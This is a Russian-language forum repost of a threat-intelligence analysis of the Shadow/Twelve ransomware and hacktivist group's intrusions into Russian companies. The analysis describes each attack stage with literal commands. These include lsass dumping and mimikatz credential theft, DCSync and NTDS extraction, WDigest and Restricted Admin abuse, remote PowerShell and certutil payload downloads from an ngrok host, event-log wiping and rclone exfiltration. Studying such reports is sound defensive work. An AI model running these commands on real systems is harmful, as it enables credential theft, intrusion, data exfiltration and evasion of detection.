ANTICHAT - Описание атак группировки Shadow

Эксперты Лаборатории цифровой криминалистики компании F.A.C.C.T. зафиксировалиатаки преступного синдиката Shadow и их сообщников на российские компании. Обе независимые группировки — вымогатели Shadow и хактивисты Twelve — на самом деле являются частями одной и той же хак-группы. Злоумышленники преследовали разные цели: Shadow была мотивирована на финансовую выгоду, тогда как Twelve стремилась к полному разрушению ИТ-инфраструктуры своих жертв. Рассмотрим подробнее все этапы атаки группировки.

Первоначальный доступ

В различных атаках Shadow получают первоначальный доступ через фишинговые рассылки или легитимные аутентификационные данные, купленные на теневых площадках, или добытые в атаках на подрядчиков. Кроме того, они комибинируют два этих метода, отправляя фишинг с внутренних аккаунтов внутри компании. Так же для проникновения на периметр организаций группировка экспулатирует уязвимости в публично доступных сервисах.

— RCE-уязвимости Atlassian Confluence (CVE-2023-22515, CVE-2023-22518);
— цепочку уязвимостей Zimbra (CVE-2019-9670, CVE-2019-9621);
— цепочку уязвимостей ProxyShell (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207);
— RCE-уязвимость JetBrains TeamCity (CVE-2024-27198).

Развитие в инфраструктуре

Первоначально злоумышленники изучают окружение: содержимое доступных сетевых катологов, различных файлов, максимальную информацию о скомпрометированной учетной записи, о домене, в который она входит.

Код:

whoami

Код:

whoami > C:\temp\v8_F105_4a.txt

Код:

net user /domain

Код:

net localgroup /domain

Код:

net group «Администраторы домена» /domain

Код:

nltest /trusted_domains

Код:

nltest /dclist:

Далее Shadow выгружают конфиденциальную информацию из БД с помощью штатных утилит для различных СУБД или с помощью программы DBeaver.После извлечения данных происходит эксфильтрация данных на подконтрольный хост через буфер обмена или популярные файлообменники Mega[.]io , gofile[.]io ,dropmefiles[.]net.

После похищения части информации атакующие приступают к повышению привилегий и дальнейшему развитию атаки. В случае, если у них есть доступ к непривилегированным аккаунтам, они могут воспользоваться уязвимостями (CVE-2021-40449, CVE-2022-21882, CVE-2022-21999, CVE-2023-21746, CVE-2020-1472). Для эксплуатации последней уязвимости используется инструмент AutoZerologon. В другом случае, когда у группировки уже есть права локального администратора, для получения СИСТЕМЫ они используют утилиту PsExec:

Код:

psexec.exe -i -s cmd

Далее злоумышленники приступают к поиску и компрометации учетных записей привилегированных пользователей домена. Они извлекают аутентификационные данные с помощью утилиты ProcDump создавая дамп процесса lsass.exe (procdump.exe -accepteula -64 -ma lsass.exe 1.dmp) и используя скрипты Veeam-Get-Creds.ps1 и Get-GPPPassword.ps1.Для извлечения данных из дампа Shadow используют mimikatz

Код:

Код:

mimikatz.exe

-> sekurlsa::minidump 1.dmp

-> sekurlsa::logonPasswords full

Для перемещения по инфраструктуре используются протоколы RDP, SSH, SMB, WinRM, DCOM и уязвимости CVE-2020-1472, CVE-2017-0144. В качестве инструментов злоумышленники используют: встроенный RDP-клиент Windows, командлеты PowerShell (Enter-PSSession , Invoke-Command), PuTTY, Impacket SMBExec и WMIExec, CrackMapExec.)

Осуществив перемещение на один из хостов группировка доставляет свои инструменты в каталоги Public% , %Public%\Temp , %systemroot%\Logs , %ProgramData% , %userprofile%\Desktop , %userprofile%\Downloads.Помимо использования портативных версий утилит, атакующие также устанавливают через powershell необходимое им ПО, например Google Chrome. Так же для перемещения используется скомпрометированные NTLM-хеши. Используя NTLM-хеш привилегированной учетной записи Shadow с помощью программы SecretsDump удаленно извлекают NTLM-хеши из базы данных Active Directory.

Код:

secretsdump.exe -hashes aad3b435b51404eeaad3b435b51404ee: -just-dcntlm

Код:

domain_redacted/login_redacted@ -outputfile ntlm-extract

В одной из атак для извлечения аутентификационных данных с DC Shadow использует атаку DCSync. (mimikatz.exe “lsadump::dcsync /user:”). В случаях перемещения на DC группировка создает копию БД AD домена через встроенную утилиту ntdsutil.

Код:

powershell.exe ntdsutil.exe ‘ac i ntds’ ‘ifm’ ‘create full C:\Users\Public\Temp\log’ q q

Далее для поиска рабочих станций привилегированных пользователей реализуется следующая техника: собираются события 1149из журнала Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational с контроллеров домена

Код:

powershell.exe -ex bypass -f Get-RDPLogs.ps1 -ComputerName > log.txt

Код:

Get-WinEvent «Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational» | ?{$_.ID -eq «1149»} | %{ New-Object PSObject -Property @{MachineName = $_.MachineName TimeCreated = $_.TimeCreatedUser = $_.Properties[0].Value Domain = $_.Properties[1].Value SourceIP = $_.Properties[2].Value } }

Затем с помощью программы для восстановления паролей XenAllPasswordPro и NTLM-хеша целевого пользователя извлекаются аутентификационные данные из веб-браузеров, клиентов электронной почты, мессенджеров, менеджеров загрузки, СУБД, хранилищ аутентификационных данных Windows, VPN клиентов и других источников. Так же в арсенале группировки есть утилита ff_graberдля извлечения сохраненных паролей и сертификатов из профилей браузера Mozilla Firefox (ff.exe list_comps.txt c:\users\public\ff 200).

Когда злоумышленникам не удается получить данные в открытом виде они включает протокол WDigestна целевых системах и завершают сеансы пользователей, чтобы вынудить их снова ввести свой пароль в уже небезопасной конфигурации системы, затем извлекают его.

Код:

Код:

psexec \\ cmd

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

logoff

Если активность со стороны пользователей долго время отсутствует Shadow принудительно включает режим Restricted Admin на целевой системе и подключается к ней.

Код:

Код:

psexec \\ cmd

New-ItemProperty -Path «HKLM:\System\CurrentControlSet\Control\Lsa» -Name «DisableRestrictedAdmin» -Value «0» -PropertyType DWORD -Force

Exit

mimikatz.exe

-> sekurlsa:: pth /user: /domain: /ntlm:  /run:»mstsc.exe /restrictedadmin»

Разведкаиизучение

Одновременно с получением данных происходит углубленная разведка с помощью инструментов AdExplorer, PingCastle, Slitheris Network Discovery, fscan, SoftPerfect Network Scanner, ADRecon, PowerView.ps1, SA.ps1, adPEAS.

Закрепление

Для закрепления Shadow используют инструмент Cobint,устанавливая его в качестве службы Windows. Загрузка ВПО осуществляется с помощью powershell скриптов.

Код:

powershell.exe -ep byp ass -w hidden -c iex ((New ObjectNet.WebClient).DownloadString(‘http://*’))

Код:

powershell.exe -ex bypass -c Invoke-WebRequest http://... -OutFile C:\ProgramData\InternetExplorer\*.ps1

ngrokиспользуется в качестве основного резервного канала доступа в скомпрометированную инфраструктуру. Исполняемый файл ngrok может быть доставлен с помощью утилиты certutil. Далее группировка маскирует доставленный файл под легитимные приложения (service.exe, netsync.exe, network.exe, ondrive.exe и др.). Для закрепления ngrok в системах Shadow используют задания планировщика Windows.

Код:

certutil.exe -urlcache -split -f «https[:]//4707-89-37-173-22.ngrok-free.app/Xazb5p8khy/OneDrive.exe»

Shadow использует общий во всех атаках шаблон для планировщика в виде XML-файла, который доставляется через буфер обмена во время RDP сессии либо вручную через консоль планировщика.

На случай обнаружения злоумышленники инсталлируют в качестве службы ПО AnyDesk, которое доставляют с официального ресурса или через буфер обмена. Далее злоумышленники создают локальные или доменные учетные записи и добавляют из в группу пользователей удаленного рабочего стола и в список разрешенных для подключений по RDP, маскируя их под легитимные сервисные записи (kvcservice, svcveeam, veeam).

На Linux злоумышленники закрепляются через руткит Facefish, который прописывал путь к своей библиотеке /lib64/libs.so в файл /etc/ld.so.preload и перезапускал службы sshd.

Уклонение от обнаружения

Одним из главных приоритетов Shadow стало удаление загруженных ими инструментов и результатов их работы. Так, например они очищают записи ключа реестра HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Clientпользовательского реестра ntuser.dat, в котором хранится информация об успешных RDP подключения. Также они очищают журналы через wevtutil:

Код:

cmd.exe /c for /F «tokens=*» %1 in (‘wevtutil.exe el’) DO wevtutil.exe cl «%1»

Кроме того, злоумышленники меняют правила файрволлов, настраивают списки исключений антивирусных продуктов, отключают и иногда удаляют их.

Эксфильтрация и импакт

Для восстановления удаленной информации атакующие используют Recuva, GiliSoft Data Recovery и Wise Data Recovery. Также, Shadow собирают информацию об авторизованных сессиях мессенджера Telegram.

Эксфильтрация данных малогообъема проводится злоумышленниками через буфер обмена во время активных RDP-сессий. Данные среднегообъема могут загружаться на различные файлообменники (Mega[.]io , gofile[.]io , dropmefiles[.]net) при помощи веб-браузеров или RDP-сессий. Для эксфильтрации большихобъемов информации используется ПО Rcloneи протокол SFTP.

Код:

rclone sync -i «Q:\Shares\ FinDep» :/home/root/ /FinDep --log-level INFO --progress > dism.log

Заключительным периодом атаки является шифрование и в некоторых случаях уничтожение данных. Шифрование Windows сегмента начинается с распространения вредоносной политики домена, которая на всех системах в домене изменяет параметры службы WinRM (включает базовую аутентификацию, разрешает незашифрованный трафик и т. п.) и отключает Windows Defender, Windows Firewall, Phishing Filter Microsoft Edge, Windows SmartScreen и др. В некоторых случаях злоумышленники удаляли все доменные политики для нанесения максимального ущерба. Далее Shadow создает задачи на отключение модулей антивирусной защиты на контролируемых системах, удаляют резервные копии и заполняют дисковые пространства хранилищ нулями для невозможности восстановления. В качестве ransomware используется LockBit 3.

В отношении Unix-систем используется ransomware семейства Babuk. Для доставки используется ПО WinSCP, при помощи которой программа-вымогатель копируется в каталог /tmp атакуемой системы. После чего в контексте SSH-сессии ей назначается атрибут выполнения, а затем производится ее запуск